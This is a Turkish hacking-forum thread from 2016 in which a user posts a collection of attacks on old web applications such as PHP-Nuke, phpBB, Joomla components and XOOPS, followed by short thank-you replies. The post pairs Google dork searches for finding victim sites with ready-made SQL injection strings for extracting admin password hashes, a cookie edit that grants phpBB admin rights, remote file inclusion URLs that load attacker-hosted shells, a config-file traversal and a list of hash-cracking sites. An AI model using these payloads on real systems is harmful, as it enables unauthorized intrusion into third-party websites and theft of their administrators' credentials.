THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Minik Site Açıklarını Kullanarak Site Hackleme - KhrYsaOR -

seydahmet - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2016
Mesajlar:
83
Konular:
17
Teşekkür (Etti):
10
Teşekkür (Aldı):
39
Ticaret:
(0) %
06-01-2016 02:25
#1
Minik Site Açıklarını Kullanarak Site Hackleme - KhrYsaOR -
-MİNİ NUKE V2.3

Mini nuke sitelerle uğraşmak için ilk önce

wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.

Karşımıza gelen sitelerin sonuna

:/pages.asp?id=3%20union+select+ 0*kul_'yasaklı kelime''yasaklı kelime''yasaklı kelime'*sifre*0*0+ from+members+where+uye_id=1

Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.

MD5 i kırmak içinde

http://passcrack.spb.ru/
http://gdataonline.com/
✅ Hash Toolkit - Reverse MD5 / SHA1 Hashes ✅
http://ice.breaker.free.fr/
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lase'yasaklı kelime''yasaklı kelime'ww.epfl.ch/~oechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info/
http://www.md5lookup.com
http://www.passcracking.ru
http://www.md5lookup.com
http://www.passcracking.ru/
securitystats.com

---------------------------------------------------------------------------

-VİRTUAL WAR V.1.0

ilk önce Google ’Powered by: Virtual War v1.5.0’

Sonu /war.php olan siteleri seçiyoruz ve


war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.

Artık admin palenelindeyiz

[Eski bir açık olduğu için sonuç alamayabilirsiniz]


---------------------------------------------------------------------------
---
-PHPBB 2.0.11

işte meşhur phpbb açığı

Bize gereken en önemli program :

http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]

Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.

Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından

kurban phpbb 2.0.11 sitemizi seçicez.

Sitemizi bulduk 2 kez tıklıyoruz.

Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik

Kubidik Kodlar Gelicek Üssteki Kodu Slip

a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz

Saveliyoruz.

Artık cooike editör ile işimiz bitti

Sitemizi yeniliyoruz bakıyoruz aaaa adminiz

---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON

Google a giriyoruz aranacak kelimeye

’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.

Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi

Search bölümünü bulamadıysanız

www.hackleneceksite.com/modules.php?name=Search

Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.


---------------------------------------------------------------------------
------
-COM_REMOSİTORY

Google ’’inurl:"com_remository"

Bulduğumuz sitelere

http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php

Kodunu ekliyoruz...

---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT

Google ’inurl:modules/myAds/’

Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.

http://www.site.com/modules/myAds/an...rs+limit+1*1/*

Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...

---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB

GoogLe Arama : inurl:"toplist.php" "powered by phpbb"


Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls

--------------
- PC_COOKBOOK JOOMLA COMPONENT

- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities

- Author: JaheeMCreW

- Uygulama : pc_cookbook Component

- Version : koyans 0.3

Yapmaniz gereken bir arama moturunda örnek google’ da

" allinurl:com_pccookbook " olarak aratmaktir..

Exploit :

http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript

---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO

İlk Önce Google

Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...

http://site.com/components/com_simpl...me%20-a;id;pwd


---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion

shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...

Code:

/shoutbox/expanded.php?conf=


GoogLe Arama : inurl:"/shoutbox/expanded.php?"

---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION

Google Search=inurl:classified.php phpbazar

http://hedefsite.com/classified_righ...ell.txt?cmd=id

---------------
-BoastMachine [bmachine]

yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :

site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin

şifresini görüyoruz : )

---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion

GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"


Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls


-CaLogic Calendars V1.2.2 - Remote File Include

GoogLe Arama : CaLogic Calendars V1.2.2

kullanmak için :

http://site.com/[path]/reconfig....1;evil_script]
http://site.com/[path]/srxclr.ph...1;evil_script]


---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]

PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..


http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]/

---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]

Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..

Uretici Firma :Welkom bij ****altechniek

JetBox CMS Remote File Include

http://[domain]/ /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..

GoogLe arama : Powered by Jetbox

---------------------------------------------------------------------------
---------------------


Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?

- KhrYsaOR -
VinLaden Teşekkür etti.
Enes THT - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2015
Nereden:
Sanal Kent
Mesajlar:
208
Konular:
26
Teşekkür (Etti):
36
Teşekkür (Aldı):
17
Ticaret:
(0) %
06-01-2016 02:32
#2
Yararlı konu, sağol kardeş.
ozgur4343 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2008
Mesajlar:
22
Konular:
1
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-01-2016 02:35
#3
teşekkürler
bozkurtyelesi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
7
Konular:
2
Teşekkür (Etti):
2
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-01-2016 02:37
#4
teşekkürler bilgilendirme için
1ay1yildiz - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
6
Konular:
1
Teşekkür (Etti):
7
Teşekkür (Aldı):
0
Ticaret:
(0) %
06-01-2016 02:51
#5
saol ama %50 si işe yaramıyor

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler